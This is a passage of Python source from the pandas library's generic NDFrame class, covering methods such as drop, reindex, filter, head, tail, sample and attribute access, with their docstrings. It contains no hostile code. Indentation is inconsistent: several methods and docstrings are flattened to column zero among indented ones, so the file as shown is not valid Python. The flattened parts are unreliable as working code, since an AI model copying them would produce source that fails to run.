        value = config.get_option("mode.chained_assignment")
        if value is None:
            # user has disabled chained-assignment checking entirely
            return

        # see if the copy is not actually referred; if so, then dissolve
        # the copy weakref
        if self._is_copy is not None and not isinstance(self._is_copy, str):
            r = self._is_copy()
            if not gc.get_referents(r) or r.shape == self.shape:
                self._is_copy = None
                return

        # a custom message
        if isinstance(self._is_copy, str):
            t = self._is_copy
        elif t == "referant":
            t = (
                "\n"
                "A value is trying to be set on a copy of a slice from a "
                "DataFrame\n\n"
                "See the caveats in the documentation: "
                "https://pandas.pydata.org/pandas-docs/stable/user_guide/"
                "indexing.html#returning-a-view-versus-a-copy"
            )
        else:
            t = (
                "\n"
                "A value is trying to be set on a copy of a slice from a "
                "DataFrame.\n"
                "Try using .loc[row_indexer,col_indexer] = value "
                "instead\n\nSee the caveats in the documentation: "
                "https://pandas.pydata.org/pandas-docs/stable/user_guide/"
                "indexing.html#returning-a-view-versus-a-copy"
            )

        # honor the "mode.chained_assignment" option: raise, warn, or ignore
        if value == "raise":
            raise com.SettingWithCopyError(t)
        elif value == "warn":
            warnings.warn(t, com.SettingWithCopyWarning, stacklevel=stacklevel)
    def __delitem__(self, key) -> None:
        """
        Delete the item (column, for a DataFrame) referenced by *key*.
        """
        deleted = False

        maybe_shortcut = False
        if self.ndim == 2 and isinstance(self.columns, MultiIndex):
            try:
                # Membership test may raise TypeError for unhashable keys;
                # fall through to the plain delete below in that case.
                maybe_shortcut = key not in self.columns._engine
            except TypeError:
                pass

        if maybe_shortcut:
            # Allow shorthand to delete all columns whose first len(key)
            # elements match key:
            if not isinstance(key, tuple):
                key = (key,)
            for col in self.columns:
                if isinstance(col, tuple) and col[: len(key)] == key:
                    del self[col]
                    deleted = True
        if not deleted:
            # If the above loop ran and didn't delete anything because
            # there was no match, this call should raise the appropriate
            # exception:
            self._data.delete(key)

        # delete from the caches
        try:
            del self._item_cache[key]
        except KeyError:
            pass
# ----------------------------------------------------------------------
# Unsorted
def get(self, key, default=None):
"""
Get item from object for given key (ex: DataFrame column).
Returns default value if not found.
Parameters
----------
key : object
Returns
-------
value : same type as items contained in object
"""
try:
return self[key]
except (KeyError, ValueError, IndexError):
return default
@property
def _is_view(self) -> bool_t:
"""Return boolean indicating if self is view of another array """
return self._data.is_view
def reindex_like(
self: FrameOrSeries,
other,
method: Optional[str] = None,
copy: bool_t = True,
limit=None,
tolerance=None,
) -> FrameOrSeries:
"""
Return an object with matching indices as other object.
Conform the object to the same index on all axes. Optional
filling logic, placing NaN in locations having no value
in the previous index. A new object is produced unless the
new index is equivalent to the current one and copy=False.
Parameters
----------
other : Object of the same data type
Its row and column indices are used to define the new indices
of this object.
method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}
Method to use for filling holes in reindexed DataFrame.
Please note: this is only applicable to DataFrames/Series with a
monotonically increasing/decreasing index.
* None (default): don't fill gaps
* pad / ffill: propagate last valid observation forward to next
valid
* backfill / bfill: use next valid observation to fill gap
* nearest: use nearest valid observations to fill gap.
copy : bool, default True
Return a new object, even if the passed indexes are the same.
limit : int, default None
Maximum number of consecutive labels to fill for inexact matches.
tolerance : optional
Maximum distance between original and new labels for inexact
matches. The values of the index at the matching locations most
satisfy the equation ``abs(index[indexer] - target) <= tolerance``.
Tolerance may be a scalar value, which applies the same tolerance
to all values, or list-like, which applies variable tolerance per
element. List-like includes list, tuple, array, Series, and must be
the same size as the index and its dtype must exactly match the
index's type.
.. versionadded:: 0.21.0 (list-like tolerance)
Returns
-------
Series or DataFrame
Same type as caller, but with changed indices on each axis.
See Also
--------
DataFrame.set_index : Set row labels.
DataFrame.reset_index : Remove row labels or move them to new columns.
DataFrame.reindex : Change to new indices or expand indices.
Notes
-----
Same as calling
``.reindex(index=other.index, columns=other.columns,...)``.
Examples
--------
>>> df1 = pd.DataFrame([[24.3, 75.7, 'high'],
... [31, 87.8, 'high'],
... [22, 71.6, 'medium'],
... [35, 95, 'medium']],
... columns=['temp_celsius', 'temp_fahrenheit',
... 'windspeed'],
... index=pd.date_range(start='2014-02-12',
... end='2014-02-15', freq='D'))
>>> df1
temp_celsius temp_fahrenheit windspeed
2014-02-12 24.3 75.7 high
2014-02-13 31.0 87.8 high
2014-02-14 22.0 71.6 medium
2014-02-15 35.0 95.0 medium
>>> df2 = pd.DataFrame([[28, 'low'],
... [30, 'low'],
... [35.1, 'medium']],
... columns=['temp_celsius', 'windspeed'],
... index=pd.DatetimeIndex(['2014-02-12', '2014-02-13',
... '2014-02-15']))
>>> df2
temp_celsius windspeed
2014-02-12 28.0 low
2014-02-13 30.0 low
2014-02-15 35.1 medium
>>> df2.reindex_like(df1)
temp_celsius temp_fahrenheit windspeed
2014-02-12 28.0 NaN low
2014-02-13 30.0 NaN low
2014-02-14 NaN NaN NaN
2014-02-15 35.1 NaN medium
"""
d = other._construct_axes_dict(
axes=self._AXIS_ORDERS,
method=method,
copy=copy,
limit=limit,
tolerance=tolerance,
)
return self.reindex(**d)
def drop(
self,
labels=None,
axis=0,
index=None,
columns=None,
level=None,
inplace: bool_t = False,
errors: str = "raise",
):
inplace = validate_bool_kwarg(inplace, "inplace")
if labels is not None:
if index is not None or columns is not None:
raise ValueError("Cannot specify both 'labels' and 'index'/'columns'")
axis_name = self._get_axis_name(axis)
axes = {axis_name: labels}
elif index is not None or columns is not None:
axes, _ = self._construct_axes_from_arguments((index, columns), {})
else:
raise ValueError(
"Need to specify at least one of 'labels', 'index' or 'columns'"
)
obj = self
for axis, labels in axes.items():
if labels is not None:
obj = obj._drop_axis(labels, axis, level=level, errors=errors)
if inplace:
self._update_inplace(obj)
else:
return obj
    def _drop_axis(
        self: FrameOrSeries, labels, axis, level=None, errors: str = "raise"
    ) -> FrameOrSeries:
        """
        Drop labels from specified axis. Used in the ``drop`` method
        internally.

        Parameters
        ----------
        labels : single label or list-like
        axis : int or axis name
        level : int or level name, default None
            For MultiIndex
        errors : {'ignore', 'raise'}, default 'raise'
            If 'ignore', suppress error and existing labels are dropped.
        """
        axis = self._get_axis_number(axis)
        axis_name = self._get_axis_name(axis)
        # NOTE: rebinds `axis` from the axis number to the Index object itself
        axis = self._get_axis(axis)

        if axis.is_unique:
            # Unique axis: delegate to Index.drop and reindex to the result.
            if level is not None:
                if not isinstance(axis, MultiIndex):
                    raise AssertionError("axis must be a MultiIndex")
                new_axis = axis.drop(labels, level=level, errors=errors)
            else:
                new_axis = axis.drop(labels, errors=errors)
            result = self.reindex(**{axis_name: new_axis})

        # Case for non-unique axis
        else:
            # Build a boolean keep-mask and select with .loc, since
            # reindexing a non-unique axis is ambiguous.
            labels = ensure_object(com.index_labels_to_array(labels))
            if level is not None:
                if not isinstance(axis, MultiIndex):
                    raise AssertionError("axis must be a MultiIndex")
                indexer = ~axis.get_level_values(level).isin(labels)

                # GH 18561 MultiIndex.drop should raise if label is absent
                if errors == "raise" and indexer.all():
                    raise KeyError(f"{labels} not found in axis")
            else:
                indexer = ~axis.isin(labels)
                # Check if label doesn't exist along axis
                labels_missing = (axis.get_indexer_for(labels) == -1).any()
                if errors == "raise" and labels_missing:
                    raise KeyError(f"{labels} not found in axis")

            slicer = [slice(None)] * self.ndim
            slicer[self._get_axis_number(axis_name)] = indexer

            result = self.loc[tuple(slicer)]

        return result
    def _update_inplace(self, result, verify_is_copy: bool_t = True) -> None:
        """
        Replace self internals with result.

        Parameters
        ----------
        result : same type as self
            The object whose block manager replaces ours.
        verify_is_copy : bool, default True
            Provide is_copy checks.
        """
        # NOTE: This does *not* call __finalize__ and that's an explicit
        # decision that we may revisit in the future.
        # Caches must be dropped before swapping managers so stale boxed
        # columns are not served afterwards.
        self._reset_cache()
        self._clear_item_cache()
        self._data = getattr(result, "_data", result)
        self._maybe_update_cacher(verify_is_copy=verify_is_copy)
def add_prefix(self: FrameOrSeries, prefix: str) -> FrameOrSeries:
"""
Prefix labels with string `prefix`.
For Series, the row labels are prefixed.
For DataFrame, the column labels are prefixed.
Parameters
----------
prefix : str
The string to add before each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_suffix: Suffix row labels with string `suffix`.
DataFrame.add_suffix: Suffix column labels with string `suffix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_prefix('item_')
item_0 1
item_1 2
item_2 3
item_3 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_prefix('col_')
col_A col_B
0 1 3
1 2 4
2 3 5
3 4 6
"""
f = functools.partial("{prefix}{}".format, prefix=prefix)
mapper = {self._info_axis_name: f}
return self.rename(**mapper) # type: ignore
def add_suffix(self: FrameOrSeries, suffix: str) -> FrameOrSeries:
"""
Suffix labels with string `suffix`.
For Series, the row labels are suffixed.
For DataFrame, the column labels are suffixed.
Parameters
----------
suffix : str
The string to add after each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_prefix: Prefix row labels with string `prefix`.
DataFrame.add_prefix: Prefix column labels with string `prefix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_suffix('_item')
0_item 1
1_item 2
2_item 3
3_item 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_suffix('_col')
A_col B_col
0 1 3
1 2 4
2 3 5
3 4 6
"""
f = functools.partial("{}{suffix}".format, suffix=suffix)
mapper = {self._info_axis_name: f}
return self.rename(**mapper) # type: ignore
    def sort_values(
        self,
        axis=0,
        ascending=True,
        inplace: bool_t = False,
        kind: str = "quicksort",
        na_position: str = "last",
        ignore_index: bool_t = False,
    ):
        """
        Sort by the values along either axis.
        Parameters
        ----------%(optional_by)s
        axis : %(axes_single_arg)s, default 0
            Axis to be sorted.
        ascending : bool or list of bool, default True
            Sort ascending vs. descending. Specify list for multiple sort
            orders. If this is a list of bools, must match the length of
            the by.
        inplace : bool, default False
            If True, perform operation in-place.
        kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
            Choice of sorting algorithm. See also ndarray.np.sort for more
            information. `mergesort` is the only stable algorithm. For
            DataFrames, this option is only applied when sorting on a single
            column or label.
        na_position : {'first', 'last'}, default 'last'
            Puts NaNs at the beginning if `first`; `last` puts NaNs at the
            end.
        ignore_index : bool, default False
            If True, the resulting axis will be labeled 0, 1, …, n - 1.
            .. versionadded:: 1.0.0
        Returns
        -------
        sorted_obj : DataFrame or None
            DataFrame with sorted values if inplace=False, None otherwise.
        Examples
        --------
        >>> df = pd.DataFrame({
        ...     'col1': ['A', 'A', 'B', np.nan, 'D', 'C'],
        ...     'col2': [2, 1, 9, 8, 7, 4],
        ...     'col3': [0, 1, 9, 4, 2, 3],
        ... })
        >>> df
            col1 col2 col3
        0   A    2    0
        1   A    1    1
        2   B    9    9
        3   NaN  8    4
        4   D    7    2
        5   C    4    3
        Sort by col1
        >>> df.sort_values(by=['col1'])
            col1 col2 col3
        0   A    2    0
        1   A    1    1
        2   B    9    9
        5   C    4    3
        4   D    7    2
        3   NaN  8    4
        Sort by multiple columns
        >>> df.sort_values(by=['col1', 'col2'])
            col1 col2 col3
        1   A    1    1
        0   A    2    0
        2   B    9    9
        5   C    4    3
        4   D    7    2
        3   NaN  8    4
        Sort Descending
        >>> df.sort_values(by='col1', ascending=False)
            col1 col2 col3
        4   D    7    2
        5   C    4    3
        2   B    9    9
        0   A    2    0
        1   A    1    1
        3   NaN  8    4
        Putting NAs first
        >>> df.sort_values(by='col1', ascending=False, na_position='first')
            col1 col2 col3
        3   NaN  8    4
        4   D    7    2
        5   C    4    3
        2   B    9    9
        0   A    2    0
        1   A    1    1
        """
        # Abstract here: implemented by Series/DataFrame. The docstring
        # above is a template (%(...)s placeholders) substituted by the
        # subclasses' doc machinery.
        raise AbstractMethodError(self)
def reindex(self: FrameOrSeries, *args, **kwargs) -> FrameOrSeries:
    """
    Conform %(klass)s to new index with optional filling logic.

    Places NA/NaN in locations having no value in the previous index. A new
    object is produced unless the new index is equivalent to the current one
    and ``copy=False``.

    Parameters
    ----------
    %(optional_labels)s
    %(axes)s : array-like, optional
        New labels / index to conform to, should be specified using
        keywords. Preferably an Index object to avoid duplicating data.
    %(optional_axis)s
    method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}
        Method to use for filling holes in the reindexed object. Only
        applicable to DataFrames/Series with a monotonically
        increasing/decreasing index. ``pad``/``ffill`` propagates the last
        valid observation forward, ``backfill``/``bfill`` uses the next
        valid observation, ``nearest`` uses the nearest valid observation,
        and None (the default) leaves gaps unfilled.
    copy : bool, default True
        Return a new object, even if the passed indexes are the same.
    level : int or name
        Broadcast across a level, matching Index values on the
        passed MultiIndex level.
    fill_value : scalar, default np.NaN
        Value to use for missing values. Defaults to NaN, but can be any
        "compatible" value.
    limit : int, default None
        Maximum number of consecutive elements to forward or backward fill.
    tolerance : optional
        Maximum distance between original and new labels for inexact
        matches; either a scalar applied to every label or a list-like with
        one tolerance per element (same size and dtype as the index).

    Returns
    -------
    %(klass)s with changed index.

    See Also
    --------
    DataFrame.set_index : Set row labels.
    DataFrame.reset_index : Remove row labels or move them to new columns.
    DataFrame.reindex_like : Change to same indices as other DataFrame.

    Examples
    --------
    >>> df = pd.DataFrame({'http_status': [200, 200, 404]},
    ...                   index=['Firefox', 'Chrome', 'Safari'])
    >>> df.reindex(['Safari', 'Iceweasel'])
               http_status
    Safari           404.0
    Iceweasel          NaN

    Note that filling while reindexing does not look at the values, only at
    the original and desired indexes; use ``fillna()`` to fill pre-existing
    ``NaN`` values. See the :ref:`user guide <basics.reindexing>` for more.
    """
    # Resolve positional/keyword arguments into a per-axis-name label dict.
    axes, kwargs = self._construct_axes_from_arguments(args, kwargs)

    fill_method = missing.clean_reindex_fill_method(kwargs.pop("method", None))
    level = kwargs.pop("level", None)
    copy = kwargs.pop("copy", True)
    limit = kwargs.pop("limit", None)
    tolerance = kwargs.pop("tolerance", None)
    fill_value = kwargs.pop("fill_value", None)

    # Series.reindex doesn't use / need the axis kwarg; popping it here keeps
    # Series/Frame generic code simple.
    kwargs.pop("axis", None)

    if kwargs:
        unexpected = next(iter(kwargs))
        raise TypeError(
            "reindex() got an unexpected keyword "
            f'argument "{unexpected}"'
        )

    self._consolidate_inplace()

    # Fast path: every requested axis already matches (names and values), so
    # just copy (or return self when copy=False).
    requested = [(name, labels) for name, labels in axes.items() if labels is not None]
    if all(self._get_axis(name).identical(labels) for name, labels in requested):
        return self.copy() if copy else self

    # Multi-axis reindex in one shot when supported.
    if self._needs_reindex_multi(axes, fill_method, level):
        return self._reindex_multi(axes, copy, fill_value)

    # Otherwise reindex axis by axis.
    return self._reindex_axes(
        axes, level, limit, tolerance, fill_method, fill_value, copy
    ).__finalize__(self)
def _reindex_axes(
    self: FrameOrSeries, axes, level, limit, tolerance, method, fill_value, copy
) -> FrameOrSeries:
    """Reindex every requested axis in turn, returning the final object."""
    result = self
    for axis_name in self._AXIS_ORDERS:
        target_labels = axes[axis_name]
        if target_labels is None:
            # This axis was not requested; leave it untouched.
            continue
        current_axis = self._get_axis(axis_name)
        new_index, indexer = current_axis.reindex(
            target_labels, level=level, limit=limit, tolerance=tolerance, method=method
        )
        axis_number = self._get_axis_number(axis_name)
        result = result._reindex_with_indexers(
            {axis_number: [new_index, indexer]},
            fill_value=fill_value,
            copy=copy,
            allow_dups=False,
        )
    return result
def _needs_reindex_multi(self, axes, method, level) -> bool_t:
    """Return True when a single multi-axis reindex can be used."""
    # Filling methods and level-broadcasting are only handled axis-by-axis.
    if method is not None or level is not None:
        return False
    # Every axis must be requested for the multi path to apply.
    if com.count_not_none(*axes.values()) != self._AXIS_LEN:
        return False
    return not self._is_mixed_type
def _reindex_multi(self, axes, copy, fill_value):
    # Abstract hook: subclasses that support it reindex all axes in one pass.
    raise AbstractMethodError(self)
def _reindex_with_indexers(
    self: FrameOrSeries,
    reindexers,
    fill_value=None,
    copy: bool_t = False,
    allow_dups: bool_t = False,
) -> FrameOrSeries:
    """allow_dups indicates an internal call here """
    # Apply each axis's (index, indexer) pair to the block manager, in
    # ascending axis order so multiple operations compose deterministically.
    mgr = self._data
    for axis, (target_index, indexer) in sorted(reindexers.items()):
        baxis = self._get_block_manager_axis(axis)
        if target_index is None:
            continue
        target_index = ensure_index(target_index)
        if indexer is not None:
            indexer = ensure_int64(indexer)
        # TODO: speed up on homogeneous DataFrame objects
        mgr = mgr.reindex_indexer(
            target_index,
            indexer,
            axis=baxis,
            fill_value=fill_value,
            allow_dups=allow_dups,
            copy=copy,
        )
    # If nothing changed but a copy was requested, copy explicitly.
    if copy and mgr is self._data:
        mgr = mgr.copy()
    return self._constructor(mgr).__finalize__(self)
def filter(
    self: FrameOrSeries,
    items=None,
    like: Optional[str] = None,
    regex: Optional[str] = None,
    axis=None,
) -> FrameOrSeries:
    """
    Subset the dataframe rows or columns according to the specified index labels.

    Note that this routine does not filter a dataframe on its contents.
    The filter is applied to the labels of the index.

    Parameters
    ----------
    items : list-like
        Keep labels from axis which are in items.
    like : str
        Keep labels from axis for which "like in label == True".
    regex : str (regular expression)
        Keep labels from axis for which re.search(regex, label) == True.
    axis : {0 or 'index', 1 or 'columns', None}, default None
        The axis to filter on, expressed either as an index (int)
        or axis name (str). By default this is the info axis,
        'index' for Series, 'columns' for DataFrame.

    Returns
    -------
    same type as input object

    See Also
    --------
    DataFrame.loc : Access a group of rows and columns
        by label(s) or a boolean array.

    Notes
    -----
    The ``items``, ``like``, and ``regex`` parameters are
    enforced to be mutually exclusive. ``axis`` defaults to the info axis
    that is used when indexing with ``[]``.

    Examples
    --------
    >>> df = pd.DataFrame(np.array(([1, 2, 3], [4, 5, 6])),
    ...                   index=['mouse', 'rabbit'],
    ...                   columns=['one', 'two', 'three'])
    >>> df.filter(items=['one', 'three'])
             one  three
    mouse      1      3
    rabbit     4      6
    >>> df.filter(regex='e$', axis=1)
             one  three
    mouse      1      3
    rabbit     4      6
    >>> df.filter(like='bbi', axis=0)
             one  two  three
    rabbit     4    5      6
    """
    if com.count_not_none(items, like, regex) > 1:
        raise TypeError(
            "Keyword arguments `items`, `like`, or `regex` "
            "are mutually exclusive"
        )

    if axis is None:
        axis = self._info_axis_name
    labels = self._get_axis(axis)

    if items is not None:
        # Keep only requested labels that actually exist, preserving the
        # order given by ``items``.
        axis_name = self._get_axis_name(axis)
        keep = [label for label in items if label in labels]
        return self.reindex(**{axis_name: keep})
    if like:
        mask = labels.map(lambda label: like in ensure_str(label))
        return self.loc(axis=axis)[mask]
    if regex:
        matcher = re.compile(regex)
        mask = labels.map(lambda label: matcher.search(ensure_str(label)) is not None)
        return self.loc(axis=axis)[mask]
    raise TypeError("Must pass either `items`, `like`, or `regex`")
def head(self: FrameOrSeries, n: int = 5) -> FrameOrSeries:
    """
    Return the first `n` rows.

    This function returns the first `n` rows for the object based on
    position. It is useful for quickly testing if your object has the
    right type of data in it. For negative values of `n`, this function
    returns all rows except the last `n` rows, equivalent to ``df[:-n]``.

    Parameters
    ----------
    n : int, default 5
        Number of rows to select.

    Returns
    -------
    same type as caller
        The first `n` rows of the caller object.

    See Also
    --------
    DataFrame.tail: Returns the last `n` rows.

    Examples
    --------
    >>> df = pd.DataFrame({'animal': ['alligator', 'bee', 'falcon']})
    >>> df.head(2)
          animal
    0  alligator
    1        bee
    >>> df.head(-1)
          animal
    0  alligator
    1        bee
    """
    # Positional slicing handles negative n naturally (all but the last n).
    return self.iloc[:n]
def tail(self: FrameOrSeries, n: int = 5) -> FrameOrSeries:
    """
    Return the last `n` rows.

    This function returns the last `n` rows from the object based on
    position. It is useful for quickly verifying data, for example,
    after sorting or appending rows. For negative values of `n`, this
    function returns all rows except the first `n` rows, equivalent to
    ``df[n:]``.

    Parameters
    ----------
    n : int, default 5
        Number of rows to select.

    Returns
    -------
    type of caller
        The last `n` rows of the caller object.

    See Also
    --------
    DataFrame.head : The first `n` rows of the caller object.

    Examples
    --------
    >>> df = pd.DataFrame({'animal': ['bee', 'falcon', 'lion']})
    >>> df.tail(2)
       animal
    1  falcon
    2    lion
    >>> df.tail(-1)
       animal
    1  falcon
    2    lion
    """
    # n == 0 must be special-cased: self.iloc[-0:] would return everything.
    return self.iloc[0:0] if n == 0 else self.iloc[-n:]
def sample(
    self: FrameOrSeries,
    n=None,
    frac=None,
    replace=False,
    weights=None,
    random_state=None,
    axis=None,
) -> FrameOrSeries:
    """
    Return a random sample of items from an axis of object.

    You can use `random_state` for reproducibility.

    Parameters
    ----------
    n : int, optional
        Number of items from axis to return. Cannot be used with `frac`.
        Default = 1 if `frac` = None.
    frac : float, optional
        Fraction of axis items to return. Cannot be used with `n`.
    replace : bool, default False
        Allow or disallow sampling of the same row more than once.
    weights : str or ndarray-like, optional
        Default 'None' results in equal probability weighting.
        If passed a Series, will align with target object on index. Index
        values in weights not found in sampled object will be ignored and
        index values in sampled object not in weights will be assigned
        weights of zero.
        If called on a DataFrame, will accept the name of a column
        when axis = 0.
        Unless weights are a Series, weights must be same length as axis
        being sampled.
        If weights do not sum to 1, they will be normalized to sum to 1.
        Missing values in the weights column will be treated as zero.
        Infinite values not allowed.
    random_state : int or numpy.random.RandomState, optional
        Seed for the random number generator (if int), or numpy RandomState
        object.
    axis : {0 or 'index', 1 or 'columns', None}, default None
        Axis to sample. Accepts axis number or name. Default is stat axis
        for given data type (0 for Series and DataFrames).

    Returns
    -------
    Series or DataFrame
        A new object of same type as caller containing `n` items randomly
        sampled from the caller object.

    See Also
    --------
    numpy.random.choice: Generates a random sample from a given 1-D numpy
        array.

    Notes
    -----
    If `frac` > 1, `replacement` should be set to `True`.

    Examples
    --------
    >>> df = pd.DataFrame({'num_legs': [2, 4, 8, 0],
    ...                    'num_wings': [2, 0, 0, 0]},
    ...                   index=['falcon', 'dog', 'spider', 'fish'])
    >>> df['num_legs'].sample(n=3, random_state=1)
    fish      0
    spider    8
    falcon    2
    Name: num_legs, dtype: int64
    >>> df.sample(frac=0.5, replace=True, random_state=1)
            num_legs  num_wings
    dog            4          0
    fish           0          0
    """
    if axis is None:
        axis = self._stat_axis_number

    axis = self._get_axis_number(axis)
    axis_length = self.shape[axis]

    # Process random_state argument into a numpy RandomState.
    rs = com.random_state(random_state)

    # Check weights for compliance
    if weights is not None:

        # If a series, align with frame
        if isinstance(weights, ABCSeries):
            weights = weights.reindex(self.axes[axis])

        # Strings acceptable if a dataframe and axis = 0
        if isinstance(weights, str):
            if isinstance(self, ABCDataFrame):
                if axis == 0:
                    try:
                        weights = self[weights]
                    except KeyError as err:
                        raise KeyError(
                            "String passed to weights not a valid column"
                        ) from err
                else:
                    raise ValueError(
                        "Strings can only be passed to "
                        "weights when sampling from rows on "
                        "a DataFrame"
                    )
            else:
                raise ValueError(
                    "Strings cannot be passed as weights "
                    "when sampling from a Series."
                )

        weights = pd.Series(weights, dtype="float64")

        if len(weights) != axis_length:
            raise ValueError(
                "Weights and axis to be sampled must be of same length"
            )

        if (weights == np.inf).any() or (weights == -np.inf).any():
            raise ValueError("weight vector may not include `inf` values")

        if (weights < 0).any():
            # BUG FIX: message previously read "many not include" (typo).
            raise ValueError("weight vector may not include negative values")

        # If has nan, set to zero.
        weights = weights.fillna(0)

        # Renormalize if don't sum to 1
        if weights.sum() != 1:
            if weights.sum() != 0:
                weights = weights / weights.sum()
            else:
                raise ValueError("Invalid weights: weights sum to zero")

        weights = weights.values

    # If no frac or n, default to n=1.
    if n is None and frac is None:
        n = 1
    elif frac is not None and frac > 1 and not replace:
        raise ValueError(
            "Replace has to be set to `True` when "
            "upsampling the population `frac` > 1."
        )
    elif n is not None and frac is None and n % 1 != 0:
        raise ValueError("Only integers accepted as `n` values")
    elif n is None and frac is not None:
        n = int(round(frac * axis_length))
    elif n is not None and frac is not None:
        raise ValueError("Please enter a value for `frac` OR `n`, not both")

    # Check for negative sizes
    if n < 0:
        raise ValueError(
            "A negative number of rows requested. Please provide positive value."
        )

    locs = rs.choice(axis_length, size=n, replace=replace, p=weights)
    return self.take(locs, axis=axis)
_shared_docs[
"pipe"
] = r"""
Apply func(self, \*args, \*\*kwargs).
Parameters
----------
func : function
Function to apply to the %(klass)s.
``args``, and ``kwargs`` are passed into ``func``.
Alternatively a ``(callable, data_keyword)`` tuple where
``data_keyword`` is a string indicating the keyword of
``callable`` that expects the %(klass)s.
args : iterable, optional
Positional arguments passed into ``func``.
kwargs : mapping, optional
A dictionary of keyword arguments passed into ``func``.
Returns
-------
object : the return type of ``func``.
See Also
--------
DataFrame.apply : Apply a function along input axis of DataFrame.
DataFrame.applymap : Apply a function elementwise on a whole DataFrame.
Series.map : Apply a mapping correspondence on a
:class:`~pandas.Series`.
Notes
-----
Use ``.pipe`` when chaining together functions that expect
Series, DataFrames or GroupBy objects. Instead of writing
>>> f(g(h(df), arg1=a), arg2=b, arg3=c)
You can write
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe(f, arg2=b, arg3=c)
... )
If you have a function that takes the data as (say) the second
argument, pass a tuple indicating which keyword expects the
data. For example, suppose ``f`` takes its data as ``arg2``:
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe((f, 'arg2'), arg1=a, arg3=c)
... )
"""
@Appender(_shared_docs["pipe"] % _shared_doc_kwargs)
def pipe(self, func, *args, **kwargs):
    # Thin delegation: com.pipe also handles the (callable, data_keyword)
    # tuple form described in the shared docstring.
    return com.pipe(self, func, *args, **kwargs)
_shared_docs["aggregate"] = dedent(
"""
Aggregate using one or more operations over the specified axis.
%(versionadded)s
Parameters
----------
func : function, str, list or dict
Function to use for aggregating the data. If a function, must either
work when passed a %(klass)s or when passed to %(klass)s.apply.
Accepted combinations are:
- function
- string function name
- list of functions and/or function names, e.g. ``[np.sum, 'mean']``
- dict of axis labels -> functions, function names or list of such.
%(axis)s
*args
Positional arguments to pass to `func`.
**kwargs
Keyword arguments to pass to `func`.
Returns
-------
scalar, Series or DataFrame
The return can be:
* scalar : when Series.agg is called with single function
* Series : when DataFrame.agg is called with a single function
* DataFrame : when DataFrame.agg is called with several functions
Return scalar, Series or DataFrame.
%(see_also)s
Notes
-----
`agg` is an alias for `aggregate`. Use the alias.
A passed user-defined-function will be passed a Series for evaluation.
%(examples)s"""
)
# Shared docstring template for ``transform``; %(klass)s and %(axis)s are
# substituted per-class. Fixed a typo in the example list of functions:
# ``[np.exp. 'sqrt']`` -> ``[np.exp, 'sqrt']``.
_shared_docs[
    "transform"
] = """
Call ``func`` on self producing a %(klass)s with transformed values.
Produced %(klass)s will have same axis length as self.
Parameters
----------
func : function, str, list or dict
    Function to use for transforming the data. If a function, must either
    work when passed a %(klass)s or when passed to %(klass)s.apply.
    Accepted combinations are:
    - function
    - string function name
    - list of functions and/or function names, e.g. ``[np.exp, 'sqrt']``
    - dict of axis labels -> functions, function names or list of such.
%(axis)s
*args
    Positional arguments to pass to `func`.
**kwargs
    Keyword arguments to pass to `func`.
Returns
-------
%(klass)s
    A %(klass)s that must have the same length as self.
Raises
------
ValueError : If the returned %(klass)s has a different length than self.
See Also
--------
%(klass)s.agg : Only perform aggregating type operations.
%(klass)s.apply : Invoke function on a %(klass)s.
Examples
--------
>>> df = pd.DataFrame({'A': range(3), 'B': range(1, 4)})
>>> df
   A  B
0  0  1
1  1  2
2  2  3
>>> df.transform(lambda x: x + 1)
   A  B
0  1  2
1  2  3
2  3  4
Even though the resulting %(klass)s must have the same length as the
input %(klass)s, it is possible to provide several input functions:
>>> s = pd.Series(range(3))
>>> s
0    0
1    1
2    2
dtype: int64
>>> s.transform([np.sqrt, np.exp])
       sqrt        exp
0  0.000000   1.000000
1  1.000000   2.718282
2  1.414214   7.389056
"""
# ----------------------------------------------------------------------
# Attribute access
def __finalize__(
    self: FrameOrSeries, other, method=None, **kwargs
) -> FrameOrSeries:
    """
    Propagate metadata from ``other`` to ``self``.

    Parameters
    ----------
    other : the object from which to get the attributes that we are going
        to propagate
    method : optional, a passed method name ; possibly to take different
        types of propagation actions based on this
    """
    # Metadata is only propagated from another NDFrame; anything else
    # (scalars, tuples of frames, ...) is ignored.
    if isinstance(other, NDFrame):
        # Copy the flexible ``attrs`` mapping entry by entry.
        for key, value in other.attrs.items():
            self.attrs[key] = value
        # Propagate subclass-registered ``_metadata`` attributes, defaulting
        # to None when ``other`` lacks one.
        for attr in self._metadata:
            assert isinstance(attr, str)
            object.__setattr__(self, attr, getattr(other, attr, None))
    return self
def __getattr__(self, name: str):
    """
    After regular attribute access, try looking up the name.

    This allows simpler access to columns for interactive use.
    """
    # Note: obj.x will always call obj.__getattribute__('x') prior to
    # calling obj.__getattr__('x'), so we only get here on lookup misses.
    is_internal = (
        name in self._internal_names_set
        or name in self._metadata
        or name in self._accessors
    )
    if not is_internal and self._info_axis._can_hold_identifiers_and_holds_name(name):
        # The name is a label on the info axis (e.g. a column) -> item access.
        return self[name]
    # Fall back to the default machinery (raises AttributeError).
    return object.__getattribute__(self, name)
def __setattr__(self, name: str, value) -> None:
    """
    After regular attribute access, try setting the name
    This allows simpler access to columns for interactive use.
    """
    # first try regular attribute access via __getattribute__, so that
    # e.g. ``obj.x`` and ``obj.x = 4`` will always reference/modify
    # the same attribute.
    try:
        object.__getattribute__(self, name)
        return object.__setattr__(self, name, value)
    except AttributeError:
        pass
    # if this fails, go on to more involved attribute setting
    # (note that this matches __getattr__, above).
    if name in self._internal_names_set:
        object.__setattr__(self, name, value)
    elif name in self._metadata:
        object.__setattr__(self, name, value)
    else:
        try:
